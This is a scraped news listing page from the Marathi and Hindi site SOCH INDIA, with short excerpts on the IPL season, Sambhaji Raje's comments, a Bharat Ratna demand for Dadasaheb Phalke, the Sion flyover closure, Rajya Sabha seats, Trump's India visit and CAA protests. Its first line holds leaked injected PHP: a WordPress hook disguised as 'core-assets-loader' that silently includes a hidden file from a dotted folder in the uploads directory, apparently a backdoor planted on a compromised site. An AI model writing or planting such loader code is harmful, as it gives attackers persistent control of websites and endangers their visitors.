add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

आयपीएलच्या तेराव्या हंगामाचं बिगुल अखेरीस वाजलेलं आहे. गतविजेते मुंबई इंडियन्स आणि चेन्नई सुपरकिंग्ज यांच्यात २९ मार्चरोजी सलामीचा सामना रंगणार आहे. मार्च महिन्यात भारतीय संघ घरच्या मैदानावर दक्षिण आफ्रिकेविरुद्ध ३ वन-डे सामन्यांची मालिका खेळेल. १८ मार्चरोजी कोलकात्यात तिसरा वन-डे सामना खेळवल्यानंतर बरोबर ११ दिवसांनी आयपीएलच्या तेराव्या हंगामाला सुरुवात होणार आहे....

Read More

खासदार संभाजी राजे यांनी पुण्यातल्या एका फॅशनबाबत आपलं परखडं मत व्यक्त केलं आहे. ही फॅशन आपल्याला खटकते ती सध्या कोल्हापूर आणि पश्चिम महाराष्ट्राकडे सरकत असल्याबद्दल त्यांनी जाहीर नाराजी व्यक्त केली आहे. पिंपरी-चिंचवडमध्ये खासदार श्रीरंग बारणे सोशियल फाऊंडेशनतर्फे आयोजित कार्यक्रमात ते बोलत होते. संभाजी राजे म्हणाले, “माझा परखड बोलण्याचा प्रयत्न...

Read More

मुंबई: गोरेगांव चित्रनगरी, ऑल इंडिया सिने वर्कर्स असोसिएशन (AICWA), वेस्टर्न इंडिया फ़िल्म प्रोड्यूसर्स असोसिएशन, ऑल इंडिया मिडिया एम्प्लॉइज असोसिएशन (AiMea-आयमा), भारत सिने राइटर्स असोसिएशन जैसे विविध संगठनोंने आज दादासाहेब फालके जीको मरणोपरांत ‘भारत रत्न’ पुरस्कार देने की जोरदार मांग की गयी. आज भारतीय सिनेमा के जनक स्वर्गीय दादासाहेब फालके जी...

Read More

दुरुस्तीच्या कारणास्तव बंद असलेला शीव उड्डाणपूल सोमवारीदेखील बंद असणार आहे. उड्डाणपुलाचे बेअरिंग बदलण्याचे काम १४ फेब्रुवारीपासून सुरू आहे. निर्धारित  वेळापत्रकानुसार १७ फेब्रुवारी (सोमवारी) सकाळी ६ वाजता उड्डाणपुलावरील वाहतूक सुरू होणार होती. मात्र, तांत्रिक कारणास्तव सोमवारी उड्डाणपूल वाहतुकीला खुला केला जाणार नाही असे, महाराष्ट्र राज्य रस्ते विकास महामंडळाचे मुख्य अभियंता...

Read More

राज्यसभेतील ६८  जागा यावर्षी रिक्त होणार आहेत. यात काँग्रेस आणखी काही जागा गमावणार असल्याने सभागृहातील विरोधकांचे संख्याबळ आणखी कमी होणार आहे. रिकाम्या होणाऱ्या १९ पैकी सुमारे ९ जागा काँग्रेस गमावू शकते. प्रियंका गांधी वढेरा, ज्योतिरादित्य शिंदे आणि रणदीप सुरजेवाला यांच्यासह काही बडय़ा नेत्यांना वरिष्ठ सभागृहात आणण्याचा काँग्रेस विचार करत...

Read More

गुजरात के कांडला बंदरगाह पर चीन (china) से पाकिस्तान (Pakistan) के कराची (Karachi) जा रहे एक जहाज को रोक दिया गया है. संदेह जताया जा रहा है कि इस जहाज पर मिसाइल (missile) से जुड़ी सामग्री है जो कि बालिस्टिक मिसाइल की लॉन्चिंग में इस्तेमाल हो सकती है. जहाज पर 22 सदस्यीय क्रू सवार हैं. बंदरगाह की...

Read More

अमेरिकेचे अध्यक्ष डोनाल्ड ट्रम्प २४ फेब्रुवारीला दोन दिवसीय भारत दौऱ्यावर येणार आहेत. या दौऱ्यात ते दिल्ली आणि अहमदाबादला भेट देणार आहेत. ट्रम्प यांच्या दौऱ्याच्या पार्श्वभूमीवर अहमदाबादमध्ये जोरात तयारी सुरू आहे. या कामावरून शिवसेनेनं पंतप्रधान नरेंद्र मोदी यांचं उपरोधिक कौतूक केलं आहे. “ट्रम्प यांच्या नजरेतून गुजरातची गरिबी, झोपडय़ा सुटाव्यात यासाठी...

Read More

भाजप सरकारने सुधारित नागरिकत्व कायदा (सीएए) आणि राष्ट्रीय लोकसंख्या नोंदणीच्या(एनपीआर) माध्यमातून देशात दुही माजवली आहे. ब्रिटिशांप्रमाणे भाजपही हिंदू-मुस्लीमांना आपआपसात लढवण्याचा प्रयत्न करून आपली राजकीय पोळी भाजून घेण्याच्या प्रयत्नात आहे. मात्र देशभर सुरू असलेले आंदोलन आणखी तीव्र करून भाजपचे प्रयत्न हाणून पाडले जातील, असा निर्धार शनिवारी मुंबईत ६५ संघटनांनी आयोजित...

Read More

स्थापनेपासूनच अभ्यासक्रमावरून सातत्याने वादात सापडलेले आंतरराष्ट्रीय शिक्षण मंडळ बरखास्त करून त्याच्या आजपर्यंतच्या कारभाराची चौकशी करण्यात यावी अशी मागणी शिक्षक, सामाजिक कार्यकर्ते, अभ्यासक, संघटनांनी केली आहे. हे मंडळ राज्यघटना, शिक्षण हक्क कायदा, ‘राष्ट्रीय अभ्यासक्रम आराखडा २००५’ यांचा भंग करत असल्याचा आरोप शिक्षण मंत्र्यांना देण्यात आलेल्या निवेदनात करण्यात आला आहे. मंडळाच्या...

Read More